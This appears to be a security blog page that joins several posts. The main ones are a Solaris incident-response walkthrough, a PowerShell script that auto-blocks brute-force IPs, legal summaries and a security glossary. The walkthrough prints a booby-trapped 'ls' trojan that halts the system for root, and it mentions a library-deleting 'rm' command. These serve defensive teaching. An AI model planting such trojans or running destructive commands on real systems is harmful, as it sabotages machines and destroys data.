Hacking Servers: A beginner’s guide

This information is to be used for informational purposes only.

I am asked at least 5 or more times a day by young, beginning “hackers”, “How can I hack?” or “Is there a way to hack a web site?” Well there is. There are, in fact, literally hundreds of ways to do this. I will discuss a few in this text to get you started. Every hacker has to start somehow and hacking web servers and ftp servers is one of the easiest ways.

If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who don’t know. Continue reading “Hacking Servers: A beginner’s guide”


The Fraud Act 2006

On 15 January 2007, the Fraud Act 2006 came into force and created three ways of committing a new offence of fraud:

  • Fraud by false representation
  • Fraud by failing to disclose information
  • Fraud by abuse of position

In each case, the defendant’s conduct must be dishonest with the intention of making a gain, or must cause a loss (or the risk of a loss) to another person or individual. Crucially, no actual gain or loss needs to be proved – the fraud might have been unsuccessful or it was stopped before it could take place. These offences are ‘triable either way’ and can be tried in the Magistrates’ Court or the Crown Court, with a maximum sentence of ten years imprisonment.

The fraud offences have a wide scope in that they can be committed by a person outside of England and Wales. If you are accused of committing a fraud offence under the Fraud Act outside of this country, it is crucial that you take specialist advice, including advice on the issue of jurisdiction. Continue reading “The Fraud Act 2006”

The Computer Misuse Act of 1990

The Computer Misuse Act was enacted in the wake of the high-profile hack in 1988 of a mailbox belonging to The Duke of Edinburgh by Robert Schifreen and Stephen Gold.

Prestel screenshot

Prestel was a text-based interactive information system developed by the UK Post Office in the late 1970s. Users could browse numbered pages of text (similar to the contemporaneous Ceefax and Teletext information services) on their television as well as send electronic messages to other Prestel users. Prestel services were expensive and the system did not become widely used, although Prestel technology was sold to many other telecom companies. Prestel was gradually sold off in the early 1990s as the internet became available to domestic users. Continue reading “The Computer Misuse Act of 1990”

Beware of the Cyber Squatters

Your domain name could be stolen or given up to the evil entity known as the cyber squatters, whose main mission is to steal your web identity, and this is how they do it. They could register YourDomainName.org, and do the same thing with YourDomainName.biz, then contact you and try to sell you those names at inflated prices. If that doesn’t work, then the following could happen.

They will allow your competitor to get a domain that sounds like yours, and allow him to cause confusion or try to steal your hard-earned traffic, business and clients. Continue reading “Beware of the Cyber Squatters”

Hacked: Now What?

You have that funny feeling that something is not right. One of your admins reported that his Unix box keeps rebooting in OpenWindows. You sit down at the box, type some commands, and wham, it reboots again. This doesn’t look like a bug; you’ve been hacked! Now what do you do?

How to Prepare.

Protecting your systems is only a part of information security. Preparing for the inevitable is another. Sooner or later, one of your systems will be compromised. What then? Backups are one critical part of recovery (nothing beats a total restore), however this should be considered as a last resort.

Here we will be discussing the knowledge and tools necessary to identify a compromised system, ascertain the hack, and recover the system, without a full restore. The first part of this article will cover tools and preparations you should make now. The second part will be a step by step example using these preparations. Although this article is by no means exhaustive, I hope to give you some basic ideas of where to start. For more information, a great place to start is http://www.cert.org/nav/recovering.html.

Logging

Logging is one of your most powerful tools in recovering from a security incident; logs are your friends. With extensive logging, you can potentially track the intruder’s actions, identify what has been compromised, and fix the system. Your goal is to cover various sources of logging, so you are not dependent on a single source of information.

The first place to start is /etc/syslog.conf. This file is the central command of logging; you control the various logging functions here. At boot up, /usr/sbin/syslogd reads this config. By editing this file, we can configure how the system logs.

The first thing we want to log is all inetd connections, such as telnet, ftp, rlogin, etc., to the file /var/adm/inetdlog. This way, whenever someone connects to the system, you have a log of which IP connected when. First, create the file /var/adm/inetdlog using the touch command. Second, add the following line to /etc/syslog.conf (make sure you separate the fields with tabs, not spaces):

daemon.notice           /var/adm/inetdlog

Now, restart /usr/sbin/syslogd with kill -HUP; this ensures logging to inetdlog. We are not done yet. To enable this, inetd has to be running with both the -s and -t parameters. In the last line of /etc/rc2.d/S72inetsvc, edit as follows:

/usr/sbin/inetd -s -t

Now all inetd connections will be logged. For the -t parameter to take effect, you can either reboot the system, or kill /usr/sbin/inetd and then manually launch /usr/sbin/inetd with the -s and -t parameters. The only problem now is that we are depending on a single source of information. If your system were compromised, the intruder could easily modify the logging on that system. To protect against this, we have all logging sent to an additional logging host as well, so we have two sources of logging. For this, we add an additional line to /etc/syslog.conf:

daemon.notice           @logger

For the truly paranoid, we can add one more layer of protection: have all logging output sent to a printer. This way, the only way someone could compromise the logging is by having physical access to the printer. For this, we add one last line to /etc/syslog.conf:

daemon.notice           /dev/printer

There are two other logs we want to ensure are functioning, /var/adm/sulog and /var/adm/loginlog. Sometimes these logs are not enabled by default. sulog records all su attempts, whether successful or not. loginlog records all login attempts that fail 5 consecutive times. Both logs can be enabled by touching the following two files:

/var/adm/sulog
/var/adm/loginlog

The last step for logging is permissions. Solaris (even 2.6) has the nasty habit of setting bad permissions in /var/adm. Bad in that most logs can be read by everyone, and some can even be written by everyone. Keep in mind that /var/adm/loginlog and /var/adm/log/asppp.log keep passwords in plaintext. The best thing to do is chmod 750 * in /var/adm.

Executables

This will be our second tool for dealing with a compromised system. When you access a compromised system, you can’t rely on the environment or the files. The intruder most likely altered both. To protect yourself, create a floppy (or CDROM) that contains critical executables. These are the executables you will be using in the future. The first thing you do on a compromised system is set your $PATH to the floppy; that way you are absolutely sure you are executing uncorrupted files. Examples of critical executables would include:

/usr/bin/ls           /usr/bin/grep
/usr/bin/find         /usr/bin/more
/usr/bin/truss        /usr/bin/vi

Also, keep a printout of all suid (mode 4000) files and all hidden files (.*) on the floppy. This way you can determine if any new hidden or suid files have been added to the compromised system.
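The "printout on the floppy" above is really a baseline you compare against. As an added example (not code from the original article), this script builds that baseline with the article's own find checks and reports anything new; the directory holding the baseline files and the owner to check are assumptions, and the demo uses a constructed directory tree instead of the real filesystem.

```shell
#!/bin/sh
# Added example, not from the original article: inventory setuid and hidden
# files under a root directory, then compare a later scan against a saved
# baseline. Assumes the baseline files live in a directory of your choosing
# (here a temp dir) and that the owner to check is root unless overridden.

# inventory ROOT OUTFILE [OWNER]
# Write one line per setuid file owned by OWNER and per hidden file (name
# beginning with a dot) found under ROOT, sorted so two runs can be compared.
inventory() {
    root=$1; out=$2; owner=${3:-root}
    {
        # the article's check: find / -user root -perm -4000 -print
        find "$root" -user "$owner" -perm -4000 -type f -print 2>/dev/null
        # the article's check for hidden names, which also catches ".. "
        find "$root" -name '.*' -print 2>/dev/null
    } | sort -u > "$out"
}

# new_entries BASELINE CURRENT
# Print paths present in CURRENT but absent from BASELINE: newly added
# setuid or hidden files that deserve a closer look.
new_entries() {
    comm -13 "$1" "$2"
}

# demo: constructed directory tree standing in for the real filesystem.
# Prints the new entries found after a simulated compromise.
demo() {
    tmp=$(mktemp -d)
    me=$(id -un)                     # the demo cannot create root-owned files
    mkdir -p "$tmp/bin" "$tmp/home"
    : > "$tmp/home/.profile"         # an expected, pre-existing hidden file
    inventory "$tmp" "$tmp/baseline.txt" "$me"

    # simulated intruder changes: a new setuid binary and a ".. " directory
    : > "$tmp/bin/ls"; chmod 4755 "$tmp/bin/ls"
    mkdir "$tmp/home/.. "
    inventory "$tmp" "$tmp/current.txt" "$me"

    new_entries "$tmp/baseline.txt" "$tmp/current.txt"
    rm -rf "$tmp"
}

demo
```

On a real system, run inventory once from the trusted floppy while the box is known good, store the output with the floppy, and rerun it against that file during an investigation.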

Now What?

Now, back to that system that kept rebooting in OpenWindows. If you remember, one of your admins reported that his/her system is rebooting randomly in OpenWindows, specifically if you are root. You decide to verify for yourself. You reboot, go into OpenWindows, and do nothing: nothing happens after 10 minutes of staring at the screen. You decide to look around. After typing some basic commands, wham, the system reboots. Yep, this does not look like a bug; you have been hacked AND booby trapped. NOW WHAT? Here is an example of one possible option for troubleshooting the system.

Being the ever diligent admin, you already read an article similar to this, so you have both logs and floppy ready. So, where do we start? Logs are a great place to start, but first, never trust the environment, assume that the intruder has changed it (he/she probably already has).

You reboot the system, but escape out of OpenWindows starting up. You mount your handy floppy, set the path so it points ONLY to it, and then confirm your environment with the env command. This way you know that you are executing trusted files. We are now ready to start investigating the system.

You decide to start with basic checks of critical files. You begin with the command

find / -user root -perm -4000 -print

You compare all the suid files to the ones on your floppy. Everything checks out; there are no new suid files. Now let’s see if any new hidden files have been added. You then try:

find / -name ".. " -print &
find / -name ".*" -print

No: everything checks out; there have been no new hidden or suid root files added. You decide to move on to the log files, specifically /var/adm/messages; again, nothing suspicious. So far everything checks out. You decide to get daring and try out the binaries on the system; again nothing. The system seems to be working just fine, as long as you are not in OpenWindows.

You decide to recreate the problem: you launch OpenWindows. From OpenWindows, you start poking around without using your floppy, then wham, it reboots! Aha, progress: the system reboots, but only when you use the system binaries while in OpenWindows. As the system reboots again you once again cancel out of OpenWindows. You reset your environment back to the floppy. You decide to try OpenWindows again, except this time we will use our buddy truss (we can trust truss since we are using our floppy).

# truss -f -t exec -o /var/adm/truss /usr/openwin/bin/openwin

You go into OpenWindows, and start poking around in the OpenWindows environment. Wham, sure enough, the system reboots, but you have the culprit with truss! After the reboot, using your floppy, you cat your truss file located at /var/adm/truss. Aha, you find the culprit at the end of the truss file: the system is executing halt.

So, you have found the hack: you are executing halt in OpenWindows. The system has been booby trapped, but how? For one last time, you launch openwin, and from there you take a look at the environment. You notice that your path has changed: /usr/openwin/bin has been added to the beginning of the path. Any commands you execute will be looked up there first. Now you remember, openwin adds itself to the beginning of your path by default!

Using our trusted binaries by setting $PATH to our floppy, we cruise over to /usr/openwin/bin. You do a grep for “halt”, and sure enough, you have found the hack. The intruder has left a booby trap: he/she created a new file, /usr/openwin/bin/ls (see Listing A).

Now, let’s find out who did it; this is where our logging comes in! The first log we want to look at is /var/adm/inetdlog. Here we find, by IP address, all the users that have connected to the server. We are looking for any IP addresses that should not be there, potentially with the same time/date stamp as /usr/openwin/bin/ls. Sure enough, you find an IP that looks suspicious, hacker.com. Now, let’s find out what that user’s login was. With the suspicious IP address, you can map the intruder’s login to the IP with the “last” command, piping it into grep for the IP address.

Sure enough, you got him, but what concerns you is that it’s the login of one of your admins. You take a look at /var/adm/loginlog, but there are no failed attempts. It looks like the intruder knew the password for the login ahead of time. You take a look at /var/adm/sulog; once again, there are no failed attempts. This user didn’t have to guess any passwords. It looks like one of your admins has been careless with his/her password. How you handle this problem is for another article.

There are a variety of other tools and techniques to use, such as checksums, Tripwire, etc. The ideas mentioned here are just the first step in that preparation. To learn more, check out http://www.cert.org/nav/recovering.html

Listing A:

# cat /usr/openwin/bin/ls
#!/bin/ksh
# booby-trapped "ls": behaves normally for everyone except root
if [ "$LOGNAME" = "root" ]
then
    /usr/bin/ls
    # halt the machine 5 seconds later, silently, in the background
    (sleep 5; /sbin/halt) > /dev/null 2>&1 &
else
    /usr/bin/ls
fi

A basic script that ruins your day. Imagine if rm /usr/lib/libc* was in there!
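The lesson of Listing A is that whichever directory comes first in $PATH decides which "ls" runs. As an added example (not code from the original article), this script takes the known-good copies on the trusted medium and, for each one, resolves the same name along a given PATH and reports the first hit if it is not byte-for-byte identical; the trusted directory and the PATH string are parameters, and the demo builds a constructed tree with a harmless stand-in for the booby trap.

```shell
#!/bin/sh
# Added example, not from the original article: report commands that an
# earlier $PATH entry shadows, the trick behind the /usr/openwin/bin/ls
# booby trap. Assumes TRUSTED_DIR holds known-good copies (the floppy) and
# PATHLIST is the colon-separated search path the suspect environment uses.

# shadowed_commands TRUSTED_DIR PATHLIST
# For each command in TRUSTED_DIR, print the file PATHLIST would actually
# run when it is not identical to the trusted copy.
shadowed_commands() {
    trusted=$1
    old_ifs=$IFS; IFS=:; set -f; set -- $2; set +f; IFS=$old_ifs  # split on ':'
    for cmd in "$trusted"/*; do
        name=${cmd##*/}
        for dir in "$@"; do
            [ -f "$dir/$name" ] && [ -x "$dir/$name" ] || continue
            # the first executable wins, exactly as the shell's lookup does
            if ! cmp -s "$dir/$name" "$cmd"; then
                printf '%s shadows trusted %s\n' "$dir/$name" "$cmd"
            fi
            break
        done
    done
}

# demo: constructed tree with a floppy, a system bin directory and an
# "openwin" bin directory that is prepended to the path, as in the article.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/floppy" "$tmp/usr/bin" "$tmp/usr/openwin/bin"
    # trusted copies of ls and env on the floppy, with identical system copies
    for c in ls env; do
        printf '#!/bin/sh\nexec /bin/%s "$@"\n' "$c" > "$tmp/floppy/$c"
        cp "$tmp/floppy/$c" "$tmp/usr/bin/$c"
    done
    # stand-in for the booby trap: a different ls in the prepended directory
    printf '#!/bin/sh\necho "not the real ls"\n' > "$tmp/usr/openwin/bin/ls"
    chmod 755 "$tmp"/floppy/* "$tmp"/usr/bin/* "$tmp"/usr/openwin/bin/*

    shadowed_commands "$tmp/floppy" "$tmp/usr/openwin/bin:$tmp/usr/bin"
    rm -rf "$tmp"
}

demo
```

Run it from the trusted floppy with the PATH that openwin sets, and the one line it prints for ls is the booby trap; env, identical to its trusted copy, is not reported.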


Are you under attack? Here's a script that will block those attackers

If you have had a public-facing server in your company, you will know that there are a lot of people without scruples who will try to hack into your server and steal your data (or simply do it for fun). I have had two servers now with different providers and the same thing happened over and over again. Unless the server was locked down to one single access IP, I would have thousands and thousands of hacking attempts per hour, every day, every week. After going through the event logs trying to figure out if any of them were successful, I found the need to automate IP blocking.

I had a list of 200+ IPs I would block (mostly from China), and no sooner would I finish the block than another attempt would start. It would last between 1 min and 2 h, during which the server would receive continuous login attempts with usernames and passwords. I had to change the administrator username as it would be locked out after a few attempts. I could not face this on my own, so I found this nice little PowerShell script to help.


This script tries to find attacking IP addresses and then add them to a Windows Firewall block rule.

Server Setup:

  1. You are running a Windows Server 2008 facing the Internet.
  2. You need to have some ports open for services, e.g. TCP 21 for FTP and TCP 3389 for Remote Desktop. You can see in my code I’m only dealing with these two since that’s what I opened. You can add further port numbers if you like, but the way to process them might differ from these two.
  3. I strongly suggest you use a STRONG password and follow all security best practices; this ps1 code is NOT for adding security to your server, but for reducing the nuisance of brute force attacks and making the sysadmin’s life easier: i.e. your FTP log won’t hold megabytes of nonsense, and your Windows system log will not roll over and only be able to tell you what happened last month.
  4. You are comfortable with setting up Windows Firewall rules. In my code, my rule has the name “MY BLACKLIST”; you need to set up a similar one and set it to BLOCK everything.
  5. My rule is dangerous because it has the risk of blocking myself out as well. I do have a backup plan, i.e. the DELL DRAC5, so that if that happens I can still remote console to my server and reset the firewall.
  6. By no means is the code perfect; the coding style, the use of PowerShell skills, the hard coded parts, all can be improved. It’s just that it’s good enough for me already. It has been running on my server for more than 7 MONTHS.
  7. The current code still has a problem I haven’t solved yet; more on this point after the code. 🙂

#Dong Xie, March 2012
#http://sqlblogcasts.com/blogs/dong/archive/2012/03/06/auto-blocking-attacking-ip-address.aspx

#my simple code to monitor attack and deal with it
#Windows Server 2008 Logon Type
#8: NetworkCleartext, i.e. FTP
#10: RemoteInteractive, i.e. RDP

$tick = 0;
"Start to run at: " + (Get-Date);

#RDP listener addresses in netstat output, followed by the remote IP (capture group 1)
$regex1 = [regex] "192\.168\.100\.(?:101|102):3389\s+(\d+\.\d+\.\d+\.\d+)";
#remote IP in the message body of event 4625 (failed logon)
$regex2 = [regex] "Source Network Address:\t(\d+\.\d+\.\d+\.\d+)";

while ($True) {
    $blacklist = @();

    "Running... (tick:" + $tick + ")"; $tick += 1;

    #Port 3389: IPs currently connected to RDP, except the admin workstation
    $a = @()
    netstat -no | Select-String ":3389" | ? { $m = $regex1.Match($_); `
        $ip = $m.Groups[1].Value; if ($m.Success -and $ip -ne "10.0.0.1") { $a = $a + $ip; } }

    if ($a.count -gt 0) {
        #remote IPs of recent failed RDP logons (Logon Type 10); $list keeps duplicates for counting
        $ips = Get-EventLog Security -Newest 1000 | Where-Object { $_.EventID -eq 4625 -and $_.Message -match "Logon Type:\s+10" } | foreach { `
            $m = $regex2.Match($_.Message); $ip = $m.Groups[1].Value; $ip; } | Sort-Object | Tee-Object -Variable list | Get-Unique

        foreach ($ip in $a) {
            if ($ips -contains $ip) {
                if (-not ($blacklist -contains $ip)) {
                    $attack_count = ($list | Select-String $ip -SimpleMatch | Measure-Object).count;
                    "Found attacking IP on 3389: " + $ip + ", with count: " + $attack_count;
                    if ($attack_count -ge 20) { $blacklist = $blacklist + $ip; }
                }
            }
        }
    }

    #FTP
    $now = (Get-Date).AddMinutes(-5); #check only last 5 mins.
    #Get-EventLog has built-in switch for EventID, Message, Time, etc. but using any of these it will be VERY slow.
    $count = (Get-EventLog Security -Newest 1000 | Where-Object { $_.EventID -eq 4625 -and $_.Message -match "Logon Type:\s+8" -and `
        $_.TimeGenerated.CompareTo($now) -gt 0 } | Measure-Object).count;
    if ($count -gt 50) #threshold
    {
        $ips = @();
        #newest log file of each FTP site; IIS writes the spaces of the message field as '+'
        $ips1 = dir "C:\inetpub\logs\LogFiles\FTPSVC2" | Sort-Object -Property LastWriteTime -Descending `
            | select -First 1 | gc | select -Last 200 | where { $_ -match "An\+error\+occured\+during\+the\+authentication\+process\." } `
            | Select-String -Pattern "(\d+\.\d+\.\d+\.\d+)" | select -ExpandProperty Matches | select -ExpandProperty value | Group-Object `
            | where { $_.Count -ge 10 } | select -ExpandProperty Name;

        $ips2 = dir "C:\inetpub\logs\LogFiles\FTPSVC3" | Sort-Object -Property LastWriteTime -Descending `
            | select -First 1 | gc | select -Last 200 | where { $_ -match "An\+error\+occured\+during\+the\+authentication\+process\." } `
            | Select-String -Pattern "(\d+\.\d+\.\d+\.\d+)" | select -ExpandProperty Matches | select -ExpandProperty value | Group-Object `
            | where { $_.Count -ge 10 } | select -ExpandProperty Name;
        $ips += $ips1; $ips += $ips2; $ips = $ips | where { $_ -ne "10.0.0.1" } | Sort-Object | Get-Unique;

        foreach ($ip in $ips) {
            if (-not ($blacklist -contains $ip)) {
                "Found attacking IP on FTP: " + $ip;
                $blacklist = $blacklist + $ip;
            }
        }
    }

    #Firewall change

    <# first solution using netsh, kept for reference (see the notes after the code)
    $current = (netsh advfirewall firewall show rule name="MY BLACKLIST" | where { $_ -match "RemoteIP" }).replace("RemoteIP:", "").replace(" ", "").replace("/255.255.255.255", "");
    #inside $current there is no \r or \n to remove.
    foreach ($ip in $blacklist) {
        if (-not ($current -match $ip) -and -not ($ip -like "10.0.0.*")) {
            "Adding this IP into firewall blocklist: " + $ip;
            $c = 'netsh advfirewall firewall set rule name="MY BLACKLIST" new RemoteIP="{0},{1}"' -f $ip, $current;
            Invoke-Expression $c;
        }
    }
    #>

    foreach ($ip in $blacklist) {

        $fw = New-Object -ComObject HNetCfg.FwPolicy2; # http://blogs.technet.com/b/jamesone/archive/2009/02/18/how-to-manage-the-windows-firewall-settings-with-powershell.aspx
        $myrule = $fw.Rules | where { $_.Name -eq "MY BLACKLIST" } | select -First 1; # Potential bug here?

        #note: -match treats $ip as a regex, so the dots match any character
        if (-not ($myrule.RemoteAddresses -match $ip) -and -not ($ip -like "10.0.0.*"))
        {
            "Adding this IP into firewall blocklist: " + $ip;
            $myrule.RemoteAddresses += ("," + $ip);
        }
    }

    Wait-Event -Timeout 30 #pause 30 secs

} # end of top while loop.

Further points:

1, I suppose the server is listening on port 3389 on server IPs 192.168.100.101 and 192.168.100.102; you need to replace these with your real IPs.

2, I suppose you Remote Desktop to this server from a workstation with IP 10.0.0.1. Please replace that as well.

3, The threshold for a 3389 attack is 20; you don’t want to block yourself just because you typed your password wrong 3 times. You can change this threshold by your own reasoning.

4, FTP checking looks at the log for attacks only in the last 5 mins; you can change that as well.

5, I suppose the server is serving FTP on both IP addresses and their LOG paths are C:\inetpub\logs\LogFiles\FTPSVC2 and C:\inetpub\logs\LogFiles\FTPSVC3. Change accordingly.

6, The FTP checking code only asks for the last 200 lines of the log, and the threshold is 10; change as you wish.

7, The code runs in a loop; you can set the loop time at the last line.


To run this code, copy and paste it into your editor, finish all the editing, get it to your server, open a CMD window, then type powershell.exe -File your_powershell_file_name.ps1. It will start running; you can Ctrl-C to break it.

[Screenshot: what you see when it’s running]

[Screenshot: when it has detected an attack and is adding the IP to the firewall rule]


Regarding the design of the code:

1, There are many ways you can detect an attack, but adding an IP to a block rule is no small thing; you need to think hard before doing it. Reasons for that include: you don’t want to block yourself, and you don’t want to block your customer/user, i.e. the good guy.

2, Thus for each service/port, I double check. For 3389, first it needs to show in netstat.exe, then in the Event log; for FTP, first check the Event log, then the FTP log files.

3, At three places I need to make sure I’m not adding myself into the block rule: -ne with a single IP, -like with a subnet.

Now the final bit:

1, The code will stop working after a while (depending on how busily you are attacked, it could be weeks, months, or days?!). It will throw a red error message in CMD; don’t panic, it does no harm, but it is also no longer blocking new attacks. THE REASON is not confirmed with MS people: with the COM object to manage the firewall, you can only give it a list of IP addresses up to a length of around 32KB I think; once it reaches the limit, you get the error message.

2, This is in fact my second solution, using the COM object; the first solution is still in the comment block for your reference, which uses netsh. That fails because, being run from CMD, you can only throw it a list of IPs up to 8KB.

3, I haven’t worked out the workaround yet. Some ideas include: wrap that RemoteAddresses setting line with error checking and, once it reaches the limit, use the newly detected IPs as the list instead of appending to it. This basically resets your block rule to ground zero and loses the previous bad IPs. This is not as harmful as it sounds, because, given that a certain period has passed, if any of these bad IPs still hasn’t repented and continues to attack you, it only gets 30 seconds or 20 guesses of your password before you block it again. And there is the benefit that the bad IP may turn back to good hands again, and you are not blocking a potential customer or your CEO’s home PC because once upon a time it was a zombie. Thus the ZEN of blocking: never block any IP for too long.

4, But if you insist on blocking the ugly forever, my other ideas include: call MS support and ask them how we can set an arbitrary length of IP addresses in a rule; at least from my experience at the Forum, they don’t know and they don’t care, because they think dynamic blocking should be done by some expensive hardware. Or, from a programming perspective, you can create a new rule once the old one is full; then you’ll have MY BLACKLIST1, MY BLACKLIST2, MY BLACKLIST3, … etc. Once in a while you can compile them together and start a business selling your blacklist on the market!

Enjoy the code!

p.s. (PowerShell is REALLY REALLY GREAT!)

Glossary Of Computer Security Terms

Access
A specific type of interaction between a subject and an object that results in the flow of information from one to the other. (Source: GCST)
Access Control
The process of limiting access to the resources of a system only to authorized programs, processes, or other systems (in a network). Synonymous with controlled access and limited access. (Source: GCST)
Accreditation
A formal declaration by the designated approving authority (DAA) that the automated information system (AIS) is approved to operate in a particular security mode using a prescribed set of safeguards. Accreditation is the official management authorization for operation of an AIS and is based on the certification process as well as other management considerations. The accreditation statement affixes security responsibility with the DAA and shows that due care has been taken for security. (Source: GCST)
Assurance
A measure of confidence that the security features and architecture of an AIS accurately mediate and enforce the security policy. Compare with trusted computer system. (Source: GCST)
Audit Trail
A chronological record of system activities that is sufficient to enable the reconstruction, reviewing, and examination of the sequence of environments and activities surrounding or leading to an operation, a procedure, or an event in a transaction from its inception to final results. (Source: GCST)
Authenticate
1.To verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.
2.To verify the integrity of data that have been stored, transmitted, or otherwise exposed to possible unauthorized modification.
(Source: GCST)
Authorization
The granting of access rights to a user, program, or process. (Source: GCST)
Automated Information System
An assembly of computer hardware, software, and/or firmware configured to collect, create, communicate, compute, disseminate, process, store, and/or control data or information. (Source: GCST)
Availability
The state when data is in the place needed by [or accessible to] the user, at the time the user needs them, and in the form needed by the user. (Source: GCST)
Certification
The comprehensive evaluation of the technical and nontechnical security features of an AIS and other safeguards, made in support of the accreditation process, that establishes the extent to which a particular design and implementation meet a specified set of security requirements. (Source: GCST)
Compartmented Mode of Operation
An AIS is operating in the compartmented mode when each user with direct or indirect individual access to the AIS, its peripherals, remote terminals, or remote hosts, has all of the following:
A valid personnel clearance for the most restricted information on the system.
Formal access approval for, and has signed nondisclosure agreements for, that information to which the user is to have access.
A valid need-to-know for that information to which the user is to have access.
(Source: GCST)
Covert Channel
A communications channel that allows two cooperating processes to transfer information in a manner that violates the system’s security policy. Synonymous with confinement channel. (Source: GCST)
Covert Storage Channel
A covert channel that involves the direct or indirect writing of a storage location by one process and the direct or indirect reading of the storage location by another process. Covert storage channels typically involve a finite resource (e.g., sectors on a disk) that is shared by two subjects at different security levels. (Source: GCST)
Covert Timing Channel
A covert channel in which one process signals information to another by modulating its own use of system resources (e.g., CPU time) in such a way that this manipulation affects the real response time observed by the second process. (Source: GCST)
Dedicated Mode of Operation
An AIS is operating in the dedicated mode when each user with direct or indirect individual access to the AIS, its peripherals, remote terminals, or remote hosts, has all of the following:
A valid personnel clearance for all information on the system.
Formal access approval for, and has signed nondisclosure agreements for, all the information stored and/or processed (including all compartments, subcompartments, and/or special access programs).
A valid need-to-know for all information contained within the system.
(Source: GCST)
Denial of Service
Any action or series of actions that prevent any part of a system from functioning in accordance with its intended purpose. This includes any action that causes unauthorized destruction, modification, or delay of service. Synonymous with interdiction. (Source: GCST)
Designated Approving Authority (DAA)
The official who has the authority to decide on accepting the security safeguards prescribed for an AIS, or that official who may be responsible for issuing an accreditation statement that records the decision to accept those safeguards. (Source: GCST)
Discretionary Access Control (DAC)
A means of restricting access to objects based on the identity and need-to-know of the user, process, and/or groups to which they belong. The controls are discretionary in the sense that a subject with a certain access permission is capable of passing that permission (perhaps indirectly) on to any other subject. Compare mandatory access control. (Source: GCST)
Evaluation
An assessment of a product against the Trusted Computer System Evaluation Criteria (The Orange Book).
Information Warfare
Information warfare is the activity by a hacker, terrorist, or other adversary to disrupt an information system. Traditional security addresses the protection of information. Information warfare is aimed at protecting the systems that collect, store, manipulate, and transport information so that they are not accessed by unauthorized persons and are available as needed. (Source: Defense Information Infrastructure Master Plan)
Mandatory Access Control (MAC)
A means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity. Compare discretionary access control. (Source: GCST)
Multilevel Mode of Operation
An AIS is operating in the multilevel mode when all of the following statements are satisfied concerning the users with direct or indirect access to the AIS, its peripherals, remote terminals, or remote hosts:
Some do not have a valid personnel clearance for all of the information processed in the system.
All have the proper clearance and have the appropriate formal access approval for that information to which they are to have access.
All have a valid need-to-know for that information to which they are to have access.
(Source: GCST)
Multilevel Security (MLS)
An MLS system is a system containing information with different security classifications that simultaneously permits access by users with different security clearances and needs to know. This system prevents users from obtaining access to information for which they lack authorization. (Source: DOD Directive 5200.28)
Risk
The probability that a particular threat will exploit a particular vulnerability of the system. (Source: GCST)
Risk Analysis
The process of identifying security risks, determining their magnitude, and identifying areas needing safeguards. Risk analysis is a part of risk management. Synonymous with risk assessment. (Source: GCST)
Risk Management
The total process of identifying, controlling, and eliminating or minimizing uncertain events that may affect system resources. It includes risk analysis, cost/benefit analysis, selection, implementation and test, security evaluation of safeguards, and overall security review. (Source: GCST)
Sensitive Compartmented Information
Information restricted to people who have been given formal access to the security program, called a compartment.
Security Policy
The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information. (Source: GCST)
System-High Mode of Operation
An AIS is operating in the system-high mode when each user with direct or indirect access to the AIS, its peripherals, remote terminals, or remote hosts, has all of the following:
A valid personnel clearance for all information on the system.
Formal access approval for, and has signed nondisclosure agreements for, all the information stored and/or processed (including all compartments, subcompartments, and/or special access programs).
A valid need-to-know for some of the information contained within the system.
(Source: GCST)
Trusted Computer System
A system that employs sufficient hardware and software assurance measures to allow its use for simultaneous processing of a range of sensitive or classified information. (Source: GCST)
————————————————————————

Note: “GCST” means the Glossary of Computer Security Terms, NCSC-TG-004, 21 Oct 88 (the “Olive” Book).